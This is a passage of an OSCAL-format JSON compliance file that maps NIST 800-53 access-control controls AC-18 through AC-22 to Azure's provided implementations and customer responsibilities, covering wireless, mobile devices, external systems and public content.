assets._x000D_ _x000D_"}],"responsibilities":[{"uuid":"01df3c73-a81d-4c2c-8f57-1ad7f653b004","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-070"}],"description":"The customer is responsible for documenting the rationale for executing privileged commands via remote access for customer-deployed resources. Rationale for such privileged command execution should be documented in the system security plan (SSP).","provided-uuid":"b6253eab-758b-4bd8-b1b7-0380bf5f7f51"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8f6e8667-0131-4926-a7c7-bde87cb87685","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-18","statements":[{"uuid":"5ae06ad8-c92e-4910-b626-beee97fd98ac","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-071"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-18_smt.a","by-components":[{"uuid":"ed2b32b2-675d-4447-b3a6-7a0ee0f4e498","export":{"provided":[{"uuid":"a9b42901-452d-440a-a59f-e303cd33622c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-071"}],"description":"Wireless access is not permitted within the Azure environment. While wireless exists within CorpNet to allow Secure Admin Workstations (SAWs) to connect to CorpNet wirelessly, upon authentication to the Azure environment, all network connectivity for the Azure environment is through cabling, and assets do not have wireless technology internally embedded. CorpNet SAWs are outside the Azure authorization boundary."}],"responsibilities":[{"uuid":"f9a51b5d-a2d7-47ea-b5c1-0586280df2c8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-071"}],"description":"The customer is responsible for wireless within their environment.","provided-uuid":"a9b42901-452d-440a-a59f-e303cd33622c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"5989447d-3d0d-493f-91d2-20c7ecb2dd86","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-072"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-18_smt.b","by-components":[{"uuid":"09a7c051-0b1a-479b-b31e-f5ffcb22d7fb","export":{"provided":[{"uuid":"dee08eaa-6720-4816-bb59-9147efada751","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-072"}],"description":"Azure regularly scans for rogue wireless signals on a quarterly basis within the Azure datacenters. Results are logged and documented by the Security Response Team. Any rogue signals are investigated and removed. Azure has implemented a solution to continuously monitor and alarm on detection of rogue wireless signals. This system has been deployed to Azure authorization boundary Azure datacenters in a phased deployment. This system allows for wireless scan data to be monitored continuously by the Azure Security Incident and Event Monitoring tool."}],"responsibilities":[{"uuid":"c2d1f2b1-d3df-45c9-af1a-7c53ee447cf9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-072"}],"description":"The customer is responsible for wireless within their environment.","provided-uuid":"dee08eaa-6720-4816-bb59-9147efada751"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"58998350-0263-4320-8a86-0a824a1d4335","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-18.1","statements":[{"uuid":"b40f4180-9d80-4156-96bd-41c14bf775f7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-073"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-18.1_smt","by-components":[{"uuid":"6bf95ad0-9d34-4167-80f9-5a951dc5ef41","export":{"provided":[{"uuid":"50ab7727-f5dd-4202-98cc-cadf263942db","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-073"}],"description":"Wireless access is not permitted within the Azure environment. While wireless exists within CorpNet to allow Secure Admin Workstations (SAWs) to connect to CorpNet wirelessly, upon authentication to the Azure environment, all network connectivity for the Azure environment is through cabling, and assets do not have wireless technology internally imbedded. CorpNet SAWs are outside the Azure authorization boundary._x000D_ _x000D_"}],"responsibilities":[{"uuid":"0b214a73-0b57-4065-8a53-90e2e3c9eac2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-073"}],"description":"The customer is responsible for wireless within their environment.","provided-uuid":"50ab7727-f5dd-4202-98cc-cadf263942db"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e926c520-a102-41ec-885e-0fe89901d8ca","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-18.3","statements":[{"uuid":"3c909fba-bf66-4173-86ef-4a7d4fb7c100","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-074"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-18.3_smt","by-components":[{"uuid":"36cfcfb0-4b68-47dd-973f-4c725d789e3a","export":{"provided":[{"uuid":"dfe478b2-2c06-413b-8b4c-94791f95427d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-074"}],"description":"Wireless access is not permitted within the Azure environment. While wireless exists within CorpNet to allow Secure Admin Workstations (SAWs) to connect to CorpNet wirelessly, upon authentication to the Azure environment, all network connectivity for the Azure environment is through cabling, and assets do not have wireless technology internally imbedded. CorpNet SAWs are outside the Azure authorization boundary._x000D_ _x000D_"}],"responsibilities":[{"uuid":"11525474-7c38-4e5a-b941-5187b04d0b85","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-074"}],"description":"The customer is responsible for wireless within their environment.","provided-uuid":"dfe478b2-2c06-413b-8b4c-94791f95427d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6f7d676a-9e9f-48d6-a636-e46742c04534","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-18.4","statements":[{"uuid":"d7e6a681-7d26-458f-af36-3fe8ff820ec1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-075"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-18.4_smt","by-components":[{"uuid":"be64ba77-410a-4e30-b821-4898fa05f93c","export":{"provided":[{"uuid":"c237943b-2aa5-4297-8d8d-f2df14452474","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-075"}],"description":"Wireless access is not permitted within the Azure environment. While wireless exists within CorpNet to allow Secure Admin Workstations (SAWs) to connect to CorpNet wirelessly, upon authentication to the Azure environment, all network connectivity for the Azure environment is through cabling, and assets do not have wireless technology internally imbedded. CorpNet SAWs are outside the Azure authorization boundary._x000D_ _x000D_"}],"responsibilities":[{"uuid":"2a3523b7-89ea-44c3-8fc1-db5c01388d50","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-075"}],"description":"The customer is responsible for wireless within their environment.","provided-uuid":"c237943b-2aa5-4297-8d8d-f2df14452474"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0955034f-8ba5-4c02-8116-bad344c72af9","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-18.5","statements":[{"uuid":"02e51e8e-97d8-4ac0-b043-fc11cddabd94","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-076"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-18.5_smt","by-components":[{"uuid":"c27fab8d-c3d6-4ce6-9999-2dee6970557e","export":{"provided":[{"uuid":"baa6eee3-d614-436c-8f2c-34c00976ab03","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-076"}],"description":"Wireless access is not permitted within the Azure environment. While wireless exists within CorpNet to allow Secure Admin Workstations (SAWs) to connect to CorpNet wirelessly, upon authentication to the Azure environment, all network connectivity for the Azure environment is through cabling, and assets do not have wireless technology internally imbedded. CorpNet SAWs are outside the Azure authorization boundary._x000D_ _x000D_"}],"responsibilities":[{"uuid":"8e3fe774-8508-4050-98d8-390bd4cc18ff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-076"}],"description":"The customer is responsible for wireless within their environment.","provided-uuid":"baa6eee3-d614-436c-8f2c-34c00976ab03"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"fdfee275-725e-41a5-95b4-f4e0bf53caa4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-19","statements":[{"uuid":"14aa60e3-7320-4f02-815a-38d4c967c714","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-077"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-19_smt.a","by-components":[{"uuid":"a6bb33a3-ac14-44ff-aba4-135056d25433","export":{"provided":[{"uuid":"81ce3424-3901-46df-8ae2-65261539673b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-077"}],"description":"Unauthorized mobile computing devices are not permitted in, or directly attached to, any Azure production environment."}],"responsibilities":[{"uuid":"c05996cd-aa5e-42a1-a6e7-0482b2f3b5c2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-077"}],"description":"All customers are responsible for establishing usage restrictions, configuration and connection requirements, and implementation guidance for organization-controlled mobile devices used to connect to Azure.","provided-uuid":"81ce3424-3901-46df-8ae2-65261539673b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"87ecea98-1bde-4f1c-b42d-45cf3a9cdbb6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-078"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ac-19_smt.b","by-components":[{"uuid":"7a20bc0d-e896-47c3-a678-c615a1ce3424","export":{"provided":[{"uuid":"912f1054-cd3c-4f6d-ac90-94d04da30b3e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-078"}],"description":"Mobile computing and data recording devices are not to be used in any of Microsoft's production environments without prior approval by the Datacenter Management Team via an access request. Azure monitors for all unauthorized use of mobile devices in the Azure environment and performs investigations accordingly. Azure uses various colored sticker system to identify authorized devices. Monitoring of unauthorized connections of mobile devices to servers is implemented by security officers that observe that all mobile devices used on servers must have corresponding entries in the DCAT system, which captures authorization for an individual to bring in a mobile device to the datacenter."}],"responsibilities":[{"uuid":"c94f9e7c-0345-4379-a3a4-3109466d2c6d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-078"}],"description":"All customers are responsible for establishing usage restrictions, configuration and connection requirements, and implementation guidance for organization-controlled mobile devices used to connect to Azure.","provided-uuid":"912f1054-cd3c-4f6d-ac90-94d04da30b3e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0a031a84-87cb-4561-b1ff-a83351afe244","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-19.5","statements":[{"uuid":"931af93c-497c-472a-a2d6-ae4102c0339a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-079"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ac-19.5_smt","by-components":[{"uuid":"9cc86250-8097-4a9f-9a16-01adbfd845e7","export":{"provided":[{"uuid":"01f7c881-8dcf-46e8-b18f-f9b400d5f6f2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-079"}],"description":"Vendor laptops are authorized by Datacenter Management to be connected to the Azure production environment for maintenance purposes only to synthesize diagnostic information of the environment. Vendor laptops do not have logical access (i.e. credentials) to the production environment._x000D_"}],"responsibilities":[{"uuid":"67c512a4-a1df-4436-a3c2-452e26ed2365","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-079"}],"description":"The customer is responsible for mobile devices within their environment.","provided-uuid":"01f7c881-8dcf-46e8-b18f-f9b400d5f6f2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b48320b2-07b1-4b5b-acd0-69fc7dcb66c3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-20","statements":[{"uuid":"013ad2bd-989c-423f-a059-c84b403150a6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-080"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ac-20_smt.a","by-components":[{"uuid":"e42ee1cd-1656-4c38-a395-45682e0bd7c0","export":{"provided":[{"uuid":"26a72d36-fe7a-4e79-80e5-d8ebe957d503","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-080"}],"description":"All groups supporting Azure utilize Secure Admin Workstations (SAWs). No administrative access to the information system is allowed other than through Microsoft systems and networks. Azure does not depend on external network access, internet or otherwise, for access to the cloud."}],"responsibilities":[{"uuid":"055a6d1a-cff8-44b9-bf47-0bf8cbf10512","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-080"}],"description":"The customer is responsible for establishing terms and conditions allowing authorized individuals to access the customer-deployed resources from external information systems.","provided-uuid":"26a72d36-fe7a-4e79-80e5-d8ebe957d503"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"65262d6f-8cf4-439a-b60d-c530b8b73477","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-081"},{"name":"control-origination","value":"system-specific"}],"statement-id":"ac-20_smt.b","by-components":[{"uuid":"0c6549f3-b8e7-4fa3-a90d-0e025e6dd6b3","export":{"provided":[{"uuid":"db493fb5-ddeb-411b-b2b4-ce174cf9c24b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-081"}],"description":"No administrative access to the information system is allowed other than through Microsoft systems and networks. Azure does not depend on external network access, internet or otherwise, for access to the cloud."}],"responsibilities":[{"uuid":"504b3465-d733-40ce-ab8c-b41768a8bbbb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-081"}],"description":"The customer is responsible for establishing terms and conditions allowing authorized individuals to process, store, or transmit customer-controlled information using external information systems.","provided-uuid":"db493fb5-ddeb-411b-b2b4-ce174cf9c24b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"02be77ed-866a-4207-9aae-a04a5a0ee1e2","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-20.1","statements":[{"uuid":"4907b7ee-dcfb-4d5d-b24e-d982bc8715b5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-082"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-20.1_smt.a","by-components":[{"uuid":"c3bbf073-fd3a-4f03-9a4a-1c49ceae3ce5","export":{"provided":[{"uuid":"321ad83f-508e-4202-b11e-05dbb4c90b87","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-082"}],"description":"No administrative access is allowed to the information system other than through Microsoft systems and networks._x000D_ _x000D_"}],"responsibilities":[{"uuid":"8d36b559-c3fb-4dae-a93c-c05859121911","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-082"}],"description":"The customer is responsible for establishing terms and conditions for external systems accessing, processing, storing, or transmitting organization-defined information from customer-deployed resources.","provided-uuid":"321ad83f-508e-4202-b11e-05dbb4c90b87"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6a68a344-4488-40d2-9405-d1f745ba3dd8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-083"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-20.1_smt.b","by-components":[{"uuid":"16331ebc-1e9d-4014-aeaf-bd927df058fa","export":{"provided":[{"uuid":"0d3d9392-9360-4b66-8a30-737e50ac96fa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-083"}],"description":"No administrative access is allowed to the information system other than through Microsoft systems and networks._x000D_ _x000D_"}],"responsibilities":[{"uuid":"4cec333b-523b-4520-8ef9-1b65e57b4a4a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-083"}],"description":"The customer is responsible for establishing terms and conditions for external systems accessing, processing, storing, or transmitting organization-defined information from customer-deployed resources.","provided-uuid":"0d3d9392-9360-4b66-8a30-737e50ac96fa"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"59fb289f-c810-428f-840b-51bac0e7623a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-20.2","statements":[{"uuid":"f8c3cf29-df47-4796-966b-a03d346e99a1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-084"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-20.2_smt","by-components":[{"uuid":"c8dc3d87-f1a5-4083-999d-d685f594d68d","export":{"provided":[{"uuid":"b8bd88ba-3e34-44e8-8dc0-97c9a7461d60","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-084"}],"description":"No administrative access is allowed to the information system other than through Microsoft systems and networks._x000D_ _x000D_"}],"responsibilities":[{"uuid":"041f1b76-56e1-443f-9fd5-d1f3c545c2d2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-084"}],"description":"The customer is responsible for establishing terms and conditions for external systems accessing, processing, storing, or transmitting organization-defined information from customer-deployed resources.","provided-uuid":"b8bd88ba-3e34-44e8-8dc0-97c9a7461d60"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e9a00704-0fe1-42e0-8fc8-9b4f49d18fd4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-21","statements":[{"uuid":"fb4569c0-7f00-4494-a108-509209a2ea3a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-085"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-21_smt.a","by-components":[{"uuid":"a463cd05-8137-4df9-b9d1-9ebdd900daf0","export":{"provided":[{"uuid":"22a3955a-09c8-48e8-9560-6e9a6b054fd5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-085"}],"description":"Per Microsoft corporate and Azure security policies, Azure personnel are not authorized to share Azure data or customer content outside the security boundary and thus do not make discretionary sharing decisions. Unless approved by the customer, Azure personnel do not have access to unencrypted customer data or resources. <https://www.microsoft.com/en-us/trust-center/privacy/customer-data-definitions>"}],"responsibilities":[{"uuid":"d5da749a-3b08-48a7-b1f1-41295dd5f95e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-085"}],"description":"The customer is responsible for determining when authorized users are required to use discretion as to whether to share customer-controlled information.","provided-uuid":"22a3955a-09c8-48e8-9560-6e9a6b054fd5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"973b1311-5f18-48e3-857a-4f74c138c073","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-086"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ac-21_smt.b","by-components":[{"uuid":"cd84f18d-4172-4097-ac79-4796c5dc1f54","export":{"provided":[{"uuid":"eb228a11-fbd5-4788-9c71-13575a8aaba8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-086"}],"description":"Per Microsoft corporate and Azure security policies, Azure personnel are not authorized to share Azure data or customer content outside the security boundary and thus do not make discretionary sharing decisions. Unless approved by the customer, Azure personnel do not have access to unencrypted customer data or resources. <https://www.microsoft.com/en-us/trust-center/privacy/customer-data-definitions>"}],"responsibilities":[{"uuid":"96bf47b6-374c-444f-bfb9-28dd8080c2ea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-086"}],"description":"The customer is responsible for employing a process to assist users with making information sharing decisions.","provided-uuid":"eb228a11-fbd5-4788-9c71-13575a8aaba8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6351de40-6810-4f77-abe8-01eafaee1c23","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ac-22","statements":[{"uuid":"b20b5a89-442c-433e-b429-79fea306dde4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-087"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-22_smt.a","by-components":[{"uuid":"9d45de7d-5dca-42c8-86ab-0b9ae161e685","export":{"provided":[{"uuid":"016e40b1-9c6c-48a5-b98d-fedb9c400112","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-087"}],"description":"Azure does not have any publicly accessible information systems. The only information accessible by customers are the Feature Descriptions, Developer Documents, Legal, Privacy Statement, Help, and Language Preference options on the customer facing welcome page. Azure has designated the Microsoft Content Management Team as the group authorized to make changes to this limited information. In addition to the Content Management Team, there are select, authorized individuals from within Azure that are permitted to post blog entries about Azure._x000D_ _x000D_"}],"responsibilities":[{"uuid":"b0c75e8b-9eec-42e2-acc5-638ad9e1648d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-087"}],"description":"The customer is responsible for designating authorized personnel to post publicly accessible information on customer-deployed resources.","provided-uuid":"016e40b1-9c6c-48a5-b98d-fedb9c400112"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"be4af740-95a2-4ddf-8780-112e9cf5d6be","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-088"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-22_smt.b","by-components":[{"uuid":"f72e54fd-6dce-41e6-8917-2d1f7f2fc80d","export":{"provided":[{"uuid":"deb12178-3c07-4ae5-8778-139ddc6e317d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-088"}],"description":"All Azure personnel, including those who maintain or produce publicly available content, are required to take Standards of Business conduct training. The training provides information intended to raise awareness in the areas of anti-trust, corruption, unauthorized entry/theft, business policy, public disclosure, and applicable laws and regulations. This training is required during orientation and annually thereafter._x000D_ _x000D_"}],"responsibilities":[{"uuid":"24def8c9-810a-4684-af69-48b19c1a384d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-088"}],"description":"The customer is responsible for training the personnel defined in AC-21.a to prevent disclosure of nonpublic customer-controlled information.","provided-uuid":"deb12178-3c07-4ae5-8778-139ddc6e317d"}]},"description":"See inheritance and customer responsibility 